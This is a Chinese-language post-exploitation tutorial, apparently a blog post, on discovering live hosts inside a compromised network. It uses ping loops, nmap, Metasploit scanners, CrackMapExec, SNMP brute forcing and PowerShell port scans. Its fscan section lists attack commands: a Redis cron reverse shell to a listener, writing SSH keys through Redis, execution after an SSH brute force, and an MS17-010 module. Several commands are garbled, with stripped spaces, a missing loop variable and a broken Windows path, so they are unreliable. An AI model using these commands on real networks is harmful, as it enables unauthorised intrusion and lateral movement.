內(nèi)網(wǎng)主機(jī)探測(cè)工具合集

前言

在拿下通內(nèi)網(wǎng)的主機(jī)權(quán)限后，普遍需要更進(jìn)一步的收集內(nèi)網(wǎng)信息，此時(shí)如何有效快速的探測(cè)內(nèi)網(wǎng)存活主機(jī)關(guān)系到我們下一步的進(jìn)展情況。當(dāng)然自從有了Fscan后，我們的效率已經(jīng)大大提高，不過在某些情況下fscan有時(shí)會(huì)無法正常探測(cè)，此時(shí)如何使用其他方法有效地收集內(nèi)網(wǎng)信息成了關(guān)鍵，這篇文章主要記錄一下在不同環(huán)境、不同條件下探測(cè)內(nèi)網(wǎng)存活主機(jī)的方法。

內(nèi)網(wǎng)主機(jī)探測(cè)的不同場(chǎng)景

我們主機(jī)掃描的場(chǎng)景主要分為三種：

1、獲取到了webshell，此時(shí)一般用系統(tǒng)命令或上傳腳本工具進(jìn)行探測(cè)；

2、主機(jī)已在目標(biāo)內(nèi)網(wǎng)，比如已經(jīng)通過正向或者反向代理搭建隧道的場(chǎng)景。此時(shí)可以考慮proxychains+Nmap掃描；

3、拿到了一個(gè)反彈的webshell，則可以考慮MSF。要根據(jù)不同的場(chǎng)景考慮支持存活探測(cè)的協(xié)議，包括了ARP、ICMP、SMB、 UDP、SNMP協(xié)議等；支持端口掃描的方式，包括TCP掃描、UDP掃描、ICMP掃描等。

內(nèi)網(wǎng)不同協(xié)議主機(jī)探測(cè)的方式

ICMP協(xié)議探測(cè)

它是TCP/IP協(xié)議簇的一個(gè)子協(xié)議，用于在IP主機(jī)、路由器之間傳遞控制消息?？刂葡⑹侵?a href="http://srfitnesspt.com/v/tag/1722/" target="_blank">網(wǎng)絡(luò)通不通、主機(jī)是否可達(dá)、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸用戶數(shù)據(jù)，但是對(duì)于用戶數(shù)據(jù)的傳遞起著重要的作用。

ping

ping是我們一個(gè)常用工具，主要用來測(cè)試網(wǎng)絡(luò)連通性。也可以用它來完成對(duì)C段的探測(cè)，雖然效率低時(shí)間慢，但是不易出發(fā)安全規(guī)則。（服務(wù)器開啟防火墻或者禁ping的時(shí)候不可用，否則影響探測(cè)結(jié)果）

?Windows

 for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1|find /i "ttl="

這是我在CS里執(zhí)行的ping命令，可以看到c段內(nèi)有兩臺(tái)主機(jī)存活 也可以寫進(jìn)文件里，方便后續(xù)查看。寫進(jìn)C盤的話需要administer權(quán)限，可以考慮更換盤符

@for/l%iin(1,1,255)do@ping-n1-w40192.168.1.%i&iferrorlevel1(echo192.168.1.%i>>./a.txt)else(echo192.168.1.%i>>./111.txt)

Linux

for k in $( seq 1 255);do ping -c 1 10.211.55.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

另外，還可以結(jié)合系統(tǒng)自帶的traceroute、arp 、netstat等命令收集內(nèi)網(wǎng)信息，curl、wget可以用來做端口探測(cè)

nmap

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
#或者
nmap ‐sn ‐PE ‐T4 192.168.1.0/24

UDP協(xié)議探測(cè)

Internet 協(xié)議集支持一個(gè)無連接的傳輸協(xié)議，該協(xié)議稱為用戶數(shù)據(jù)報(bào)協(xié)議（UDP，User Datagram Protocol）。UDP 為應(yīng)用程序提供了一種無需建立連接就可以發(fā)送封裝的 IP 數(shù)據(jù)包的方法。

Msf

msf > use auxiliary/scanner/discovery/udp_probe
或者
msf > use auxiliary/scanner/discovery/udp_sweep

nmap

sudo nmap -sU -T5 -sV --max-retries 1 10.211.55.5 -p 500

unicornscan（Linux下使用）

unicornscan-mU10.255.55.5

ScanLine（Windows下使用）

sl.exe -h -u 53,161,137,139 -O C:UsersAdministratorDes
ktoplog.txt -p 192.168.1.1-254

Netbios協(xié)議

NetBIOS協(xié)議是由IBM公司開發(fā)，主要用于數(shù)十臺(tái)計(jì)算機(jī)的小型局域網(wǎng)。NetBIOS協(xié)議是一種在局域網(wǎng)上的程序可以使用的應(yīng)用程序編程接口（API），為程序提供了請(qǐng)求低級(jí)服務(wù)的統(tǒng)一的命令集，作用是為了給局域網(wǎng)提供網(wǎng)絡(luò)以及其他特殊功能，幾乎所有的局域網(wǎng)都是在NetBIOS協(xié)議的基礎(chǔ)上工作的。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4

MSF

use auxiliary/scanner/netbios/nbname

nbtscan掃描

互聯(lián)網(wǎng)搜索引擎nbtscan是一個(gè)掃描WINDOWS網(wǎng)絡(luò)NetBIOS信息的小工具，2005年11月23日發(fā)布。NBTSCAN身材嬌小，簡(jiǎn)單快速。但只能用于局域網(wǎng)，可以顯示IP，主機(jī)名，用戶名稱和MAC地址等等。

下載地址：
http://www.unixwiz.net/tools/nbtscan.html#download
以Windows用法為例：nbtscan-1.0.35.exe -m 10.211.55.0/24

ARP協(xié)議

這是根據(jù)IP地址獲取物理地址的一個(gè)TCP/IP協(xié)議。主機(jī)發(fā)送信息時(shí)將包含目標(biāo)IP地址的ARP請(qǐng)求廣播到局域網(wǎng)絡(luò)上的所有主機(jī)，并接收返回消息，以此確定目標(biāo)的物理地址；收到返回消息后將該IP地址和物理地址存入本機(jī)ARP緩存中并保留一定時(shí)間，下次請(qǐng)求時(shí)直接查詢ARP緩存以節(jié)約資源。

nmap

nmap -sn -PR 10.211.55.1/24

MSF

use auxiliary/scanner/discovery/arp_sweep

netdiscover

Netdiscover是一種網(wǎng)絡(luò)掃描工具，通過ARP掃描發(fā)現(xiàn)活動(dòng)主機(jī)，可以通過主動(dòng)和被動(dòng)兩種模式進(jìn)行ARP掃描。通過主動(dòng)發(fā)送ARP請(qǐng)求檢查網(wǎng)絡(luò)ARP流量，通過自動(dòng)掃描模式掃描網(wǎng)絡(luò)地址。

sudo netdiscover -r 10.211.55.0/24 -i eth0

arp-scan

可以看到這工具掃描速度挺快的

sudo arp-scan --interface=eth0 --localnet

SMB協(xié)議

SMB（Server Message Block）通信協(xié)議是微軟和英特爾在1987年制定的協(xié)議，主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會(huì)話層（session layer）和表示層（presentation layer）以及小部分應(yīng)用層（application layer）的協(xié)議。

Msf

use auxiliary/scanner/smb/smb_version

nmap

nmap -sU -sS --script smb-enum-shares.nse  -p 445 10.211.55.3

通過cmd

for /l %a in (1,1,254) do start /min /low telnet 10.211.55.%a 445

crackmapexec

CrackMapExec（CME）是一款后滲透利用工具，可幫助自動(dòng)化大型活動(dòng)目錄(AD)網(wǎng)絡(luò)安全評(píng)估任務(wù)。其締造者@byt3bl33d3r稱，該工具的生存概念是，“利用AD內(nèi)置功能/協(xié)議達(dá)成其功能，并規(guī)避大多數(shù)終端防護(hù)/IDS/IPS解決方案?！?/p>

cme smb 10.211.55.0/24

SNMP協(xié)議

SNMP 是專門設(shè)計(jì)用于在 IP 網(wǎng)絡(luò)管理網(wǎng)絡(luò)節(jié)點(diǎn)（服務(wù)器、工作站、路由器、交換機(jī)及HUBS等）的一種標(biāo)準(zhǔn)協(xié)議，它是一種應(yīng)用層協(xié)議。SNMP 使網(wǎng)絡(luò)管理員能夠管理網(wǎng)絡(luò)效能，發(fā)現(xiàn)并解決網(wǎng)絡(luò)問題以及規(guī)劃網(wǎng)絡(luò)增長。通過 SNMP 接收隨機(jī)消息（及事件報(bào)告）網(wǎng)絡(luò)管理系統(tǒng)獲知網(wǎng)絡(luò)出現(xiàn)問題。

nmap

sudo nmap -sU --script snmp-brute 10.211.55.0/24 -T4

Msf

use auxiliary/scanner/snmp/snmp_enum

snmp for pl

這些 perl 腳本用于從目標(biāo)系統(tǒng)中提取 SNMP 數(shù)據(jù)并解析這些文件以獲取潛在的可用數(shù)據(jù)。

項(xiàng)目地址：https://github.com/dheiland-r7/snmp

這個(gè)工具在使用前需要編譯，這里參考網(wǎng)上大佬的教程

wget http://www.cpan.org/modules/by-module/NetAddr/NetAddr-IP-4.078.tar.gz
tar xvzf ./NetAddr-IP-4.078.tar.gz
cd NetAddr-IP-4.078/
perl Makefile.PL
make
make install

使用方法：./snmpbw.pl 192.168.0.1 public 2 1
 ./snmpbw.pl ipfile.txt  public 2 4

常見的一些其它工具

Fscan

這個(gè)就不多介紹了，太常見

fscan -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24  (默認(rèn)使用全部模塊)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫私鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計(jì)劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)

通過powershell腳本掃描IP地址存活

這里列舉幾個(gè)項(xiàng)目地址：

https://github.com/nettitude/PoshC2_Old/blob/master/Modules/Invoke-Arpscan.ps1
https://github.com/dwj7738/My-Powershell-Repository/blob/master/Scripts/Invoke-TSPingSweep.ps1

使用方法：

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"

此外，還可以用powershell實(shí)現(xiàn)基本的端口掃描功能

針對(duì)單個(gè)IP的多個(gè)端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

針對(duì)單個(gè)IP的多個(gè)端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

針對(duì)某IP段 & 多個(gè)端口的掃描

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.$a",$_)) "Port $_ is open!"} 2>$null}

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級(jí)web應(yīng)用資產(chǎn)掃描器，適合于內(nèi)網(wǎng)滲透測(cè)試環(huán)境下web的資產(chǎn)快捷識(shí)別，只需Python環(huán)境，無需第三方擴(kuò)展庫，掃描結(jié)果使用zoomeye網(wǎng)頁樣式。
PTscan參考了F-NAScan的設(shè)計(jì)思路，在其基礎(chǔ)上修改而成，把程序重心放在WEB掃描和識(shí)別功能上。
使用方法：

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
##
-f  指定掃描目標(biāo)文件，文件格式如list.txt所示，同時(shí)支持IP和URL
-h  指定掃描IP或IP段，支持段掃描，如192.168.1 即為掃描C段，192.168 即為掃描B段
-p  指定掃描端口，缺省使用程序中的配置端口
-m  指定線程數(shù)
-t  指定timeout
-n  不進(jìn)行ping操作，直接掃描
-b  開啟Banner識(shí)別

-r ReverseIP